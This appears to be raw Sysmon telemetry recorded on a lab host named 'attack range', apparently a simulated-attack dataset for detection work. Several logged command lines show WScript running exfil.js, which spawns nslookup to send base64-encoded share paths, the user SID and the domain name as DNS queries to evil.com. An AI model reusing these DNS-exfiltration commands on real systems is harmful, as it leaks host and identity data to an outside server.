14:16:20.061{2E1864BB-17B3-629A-1E3F-000000005F02}3765928C:\Windows\system32\cmd.exe{2E1864BB-17B4-629A-203F-000000005F02}6196C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197257Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.068{2E1864BB-17B4-629A-203F-000000005F02}6196C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B3-629A-1E3F-000000005F02}376C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkjm.tmp 2>&1 10341000x8000000000000000197256Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.029{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B3-629A-1F3F-000000005F02}7652C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197255Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.029{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B3-629A-1F3F-000000005F02}7652C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197254Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.014{2E1864BB-17B3-629A-1F3F-000000005F02}76527952C:\Windows\system32\conhost.exe{2E1864BB-17B3-629A-1E3F-000000005F02}376C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000197253Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.605{00000000-0000-0000-0000-000000000000}5400<unknown process>-udptruefalse127.0.0.1-52396-false127.0.0.1-53domain 354300x8000000000000000197252Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.493{00000000-0000-0000-0000-000000000000}884<unknown process>-udptruefalse127.0.0.1-52393-false127.0.0.1-53domain 354300x8000000000000000197251Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.391{00000000-0000-0000-0000-000000000000}5816<unknown process>-udptruefalse127.0.0.1-52390-false127.0.0.1-53domain 354300x8000000000000000197250Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.236{00000000-0000-0000-0000-000000000000}3724<unknown process>-udptruefalse127.0.0.1-52387-false127.0.0.1-53domain 10341000x8000000000000000197249Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.989{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-1F3F-000000005F02}7652C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x800000000000000043925Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:20.651{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF45E7370ABA3501FD74D415367F32EB,SHA256=4849EE7DA108AB0111ECEB4F99978FEB152D2BCF145FD9C6F052E19ED66D0A14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043924Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:20.120{0A5DF930-E3BE-6299-9D00-000000006002}2084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=6376E59F9917DF4320414C11167FC017,SHA256=7A4E50F9B17A556DFF4913C371413049F7927C63A892F6BDF10FB6184E6F44B6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197690Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.915{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B5-629A-543F-000000005F02}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197689Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.915{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B5-629A-543F-000000005F02}2316C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197688Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.915{2E1864BB-17B5-629A-543F-000000005F02}23166224C:\Windows\system32\conhost.exe{2E1864BB-17B5-629A-533F-000000005F02}2076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197687Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.884{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B5-629A-543F-000000005F02}2316C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197686Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.877{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B5-629A-533F-000000005F02}2076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197685Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.877{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197684Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.877{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197683Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.877{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197682Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.877{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197681Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.876{2E1864BB-17A1-629A-783D-000000005F02}55522616C:\Windows\System32\WScript.exe{2E1864BB-17B5-629A-533F-000000005F02}2076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197680Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.876{2E1864BB-17B5-629A-533F-000000005F02}2076C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlesblte.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197679Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.872{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlarrlfw.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197678Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.865{2E1864BB-17B5-629A-4B3F-000000005F02}48087024C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197677Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.810{2E1864BB-17B5-629A-513F-000000005F02}42805048C:\Windows\system32\conhost.exe{2E1864BB-17B5-629A-523F-000000005F02}7648C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197676Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.791{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197675Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.791{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197674Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.791{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197673Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.791{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197672Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.791{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B5-629A-523F-000000005F02}7648C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197671Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.791{2E1864BB-17B5-629A-503F-000000005F02}12165332C:\Windows\system32\cmd.exe{2E1864BB-17B5-629A-523F-000000005F02}7648C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197670Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.800{2E1864BB-17B5-629A-523F-000000005F02}7648C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B5-629A-503F-000000005F02}1216C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlarrlfw.tmp 2>&1 10341000x8000000000000000197669Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.713{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B5-629A-513F-000000005F02}4280C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197668Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.713{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B5-629A-513F-000000005F02}4280C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197667Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.713{2E1864BB-17B5-629A-513F-000000005F02}42805048C:\Windows\system32\conhost.exe{2E1864BB-17B5-629A-503F-000000005F02}1216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197666Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.675{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B5-629A-513F-000000005F02}4280C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197665Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 